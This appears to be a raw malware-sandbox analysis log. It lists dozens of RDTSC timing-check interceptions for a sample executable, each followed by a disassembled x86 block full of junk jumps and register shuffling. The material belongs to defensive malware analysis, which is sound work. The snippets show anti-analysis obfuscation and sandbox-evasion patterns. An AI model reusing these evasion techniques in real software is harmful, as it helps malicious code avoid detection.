Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54408A3 second address: 5440939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FE6E8F184C1h 0x0000000f call 00007FE6E8F184C0h 0x00000014 pop esi 0x00000015 pop edx 0x00000016 mov ch, BDh 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a pushad 0x0000001b push edi 0x0000001c pushfd 0x0000001d jmp 00007FE6E8F184C4h 0x00000022 jmp 00007FE6E8F184C5h 0x00000027 popfd 0x00000028 pop esi 0x00000029 push eax 0x0000002a push edx 0x0000002b pushfd 0x0000002c jmp 00007FE6E8F184C7h 0x00000031 add ah, FFFFFFFEh 0x00000034 jmp 00007FE6E8F184C9h 0x00000039 popfd 0x0000003a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440939 second address: 5440956 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE6E8B29090h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440956 second address: 544095A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544095A second address: 5440981 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FE6E8B29094h 0x0000000c pop eax 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov ax, A9E9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440981 second address: 5440986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440986 second address: 544098C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544098C second address: 5440990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440761 second address: 5440770 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 544043C second address: 5440441 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440441 second address: 5440447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450312 second address: 5450362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE6E8F184C7h 0x00000009 or ch, 0000003Eh 0x0000000c jmp 00007FE6E8F184C9h 0x00000011 popfd 0x00000012 movzx esi, di 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE6E8F184BFh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5450362 second address: 54503B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FE6E8B29095h 0x0000000b adc ah, FFFFFFD6h 0x0000000e jmp 00007FE6E8B29091h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007FE6E8B2908Eh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FE6E8B2908Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54503B6 second address: 54503BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54503BA second address: 54503C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54503C0 second address: 54503FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FE6E8F184BDh 0x00000013 sub si, 4D46h 0x00000018 jmp 00007FE6E8F184C1h 0x0000001d popfd 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480DD9 second address: 5480DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480DDF second address: 5480DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480DE3 second address: 5480DFE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dh, ACh 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480DFE second address: 5480E34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE6E8F184C1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480E34 second address: 5480E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480E47 second address: 5480E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480E4C second address: 5480E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, bl 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480E5D second address: 5480E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480E61 second address: 5480E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54604D8 second address: 54604F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE6E8F184C6h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54604F4 second address: 5460519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FE6E8B2908Eh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE6E8B2908Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460519 second address: 5460528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460528 second address: 54605D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29099h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FE6E8B2908Eh 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FE6E8B2908Eh 0x0000001a or ch, FFFFFFC8h 0x0000001d jmp 00007FE6E8B2908Bh 0x00000022 popfd 0x00000023 push eax 0x00000024 movsx ebx, si 0x00000027 pop esi 0x00000028 popad 0x00000029 and dword ptr [eax], 00000000h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FE6E8B29098h 0x00000035 or ax, B258h 0x0000003a jmp 00007FE6E8B2908Bh 0x0000003f popfd 0x00000040 pushfd 0x00000041 jmp 00007FE6E8B29098h 0x00000046 or eax, 63013CB8h 0x0000004c jmp 00007FE6E8B2908Bh 0x00000051 popfd 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54605D9 second address: 5460600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and dword ptr [eax+04h], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460600 second address: 5460604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460604 second address: 5460617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440663 second address: 5440681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE6E8B29095h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5440681 second address: 54406E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE6E8F184C7h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FE6E8F184BFh 0x00000013 xchg eax, ebp 0x00000014 jmp 00007FE6E8F184C6h 0x00000019 mov ebp, esp 0x0000001b jmp 00007FE6E8F184C0h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54406E0 second address: 54406E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460111 second address: 546015A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FE6E8F184BEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE6E8F184C7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460311 second address: 5460315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460315 second address: 546031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 546031B second address: 546032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8B2908Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 546032E second address: 5460360 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007FE6E8F184BBh 0x0000000f mov edi, ecx 0x00000011 pop eax 0x00000012 mov ch, bh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FE6E8F184C3h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460360 second address: 5460366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5460366 second address: 546036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 546036A second address: 546036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480692 second address: 54806AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE6E8F184C7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54806AD second address: 54806B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54806B1 second address: 5480705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FE6E8F184C2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007FE6E8F184BDh 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a jmp 00007FE6E8F184BEh 0x0000001f xchg eax, ecx 0x00000020 jmp 00007FE6E8F184C0h 0x00000025 push eax 0x00000026 pushad 0x00000027 mov esi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480705 second address: 5480737 instructions: 0x00000000 rdtsc 0x00000002 call 00007FE6E8B2908Fh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ecx 0x0000000c jmp 00007FE6E8B2908Fh 0x00000011 mov eax, dword ptr [775165FCh] 0x00000016 pushad 0x00000017 mov edi, eax 0x00000019 pushad 0x0000001a mov al, B1h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480737 second address: 54807AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test eax, eax 0x00000008 jmp 00007FE6E8F184BFh 0x0000000d je 00007FE75AF2B6CEh 0x00000013 jmp 00007FE6E8F184C6h 0x00000018 mov ecx, eax 0x0000001a pushad 0x0000001b call 00007FE6E8F184BEh 0x00000020 pushad 0x00000021 popad 0x00000022 pop esi 0x00000023 mov di, 92E4h 0x00000027 popad 0x00000028 xor eax, dword ptr [ebp+08h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FE6E8F184C6h 0x00000032 sub ah, FFFFFF98h 0x00000035 jmp 00007FE6E8F184BBh 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54807AF second address: 54807C4 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and ecx, 1Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov esi, 203F6B5Bh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54807C4 second address: 5480828 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 pushfd 0x00000007 jmp 00007FE6E8F184C3h 0x0000000c xor cl, FFFFFFBEh 0x0000000f jmp 00007FE6E8F184C9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 ror eax, cl 0x0000001a jmp 00007FE6E8F184BEh 0x0000001f leave 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FE6E8F184C7h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480828 second address: 5480831 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0C8Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480831 second address: 5480842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 retn 0004h 0x0000000a nop 0x0000000b mov esi, eax 0x0000000d lea eax, dword ptr [ebp-08h] 0x00000010 xor esi, dword ptr [00332014h] 0x00000016 push eax 0x00000017 push eax 0x00000018 push eax 0x00000019 lea eax, dword ptr [ebp-10h] 0x0000001c push eax 0x0000001d call 00007FE6EE0A8C31h 0x00000022 push FFFFFFFEh 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push ebx 0x00000028 pop eax 0x00000029 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480842 second address: 5480860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov bx, ax 0x0000000c popad 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480860 second address: 5480864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480864 second address: 5480868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5480868 second address: 548086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 548086E second address: 54808A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29096h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b push eax 0x0000000c call 00007FE6EDCB9848h 0x00000011 mov edi, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE6E8B29097h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54808A4 second address: 54808AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54808AA second address: 54808AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543005B second address: 5430089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, di 0x0000000e push edi 0x0000000f mov edx, esi 0x00000011 pop eax 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430089 second address: 543008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543008D second address: 5430093 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430093 second address: 543013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE6E8B2908Bh 0x00000009 add si, 0B1Eh 0x0000000e jmp 00007FE6E8B29099h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FE6E8B29090h 0x0000001a sbb eax, 19515918h 0x00000020 jmp 00007FE6E8B2908Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FE6E8B29094h 0x00000032 adc eax, 0B6F4378h 0x00000038 jmp 00007FE6E8B2908Bh 0x0000003d popfd 0x0000003e popad 0x0000003f and esp, FFFFFFF8h 0x00000042 pushad 0x00000043 mov cl, bl 0x00000045 pushfd 0x00000046 jmp 00007FE6E8B2908Ch 0x0000004b adc cx, DDD8h 0x00000050 jmp 00007FE6E8B2908Bh 0x00000055 popfd 0x00000056 popad 0x00000057 xchg eax, ecx 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b mov dx, cx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543013E second address: 543017C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov edx, 1341C09Eh 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f mov ecx, 7B1F6011h 0x00000014 mov ecx, 2288EC4Dh 0x00000019 popad 0x0000001a xchg eax, ecx 0x0000001b jmp 00007FE6E8F184C8h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov di, ACB0h 0x00000028 mov bh, E3h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543017C second address: 54301EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, D274h 0x00000007 jmp 00007FE6E8B2908Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE6E8B29097h 0x00000017 adc cx, C0BEh 0x0000001c jmp 00007FE6E8B29099h 0x00000021 popfd 0x00000022 push eax 0x00000023 push edx 0x00000024 pushfd 0x00000025 jmp 00007FE6E8B2908Eh 0x0000002a and ecx, 144D31B8h 0x00000030 jmp 00007FE6E8B2908Bh 0x00000035 popfd 0x00000036 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 54301EF second address: 5430280 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 766345EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FE6E8F184C2h 0x00000010 mov ebx, dword ptr [ebp+10h] 0x00000013 jmp 00007FE6E8F184C0h 0x00000018 xchg eax, esi 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE6E8F184BEh 0x00000020 jmp 00007FE6E8F184C5h 0x00000025 popfd 0x00000026 mov si, 6FA7h 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007FE6E8F184C9h 0x00000035 xor cx, A9C6h 0x0000003a jmp 00007FE6E8F184C1h 0x0000003f popfd 0x00000040 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430280 second address: 543031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE6E8B2908Eh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d pushad 0x0000000e mov cl, C9h 0x00000010 mov edi, 753DD0FEh 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FE6E8B2908Bh 0x00000020 or ch, FFFFFFAEh 0x00000023 jmp 00007FE6E8B29099h 0x00000028 popfd 0x00000029 pushfd 0x0000002a jmp 00007FE6E8B29090h 0x0000002f add ah, 00000028h 0x00000032 jmp 00007FE6E8B2908Bh 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, edi 0x0000003a jmp 00007FE6E8B29096h 0x0000003f push eax 0x00000040 jmp 00007FE6E8B2908Bh 0x00000045 xchg eax, edi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b mov si, dx 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 543031A second address: 5430338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE6E8F184BAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430338 second address: 5430347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B2908Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5430347 second address: 543038E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ECh 0x00000005 mov ecx, 725130C7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FE75AF76777h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, D7EAh 0x0000001a pushfd 0x0000001b jmp 00007FE6E8F184BBh 0x00000020 adc esi, 184FF88Eh 0x00000026 jmp 00007FE6E8F184C9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
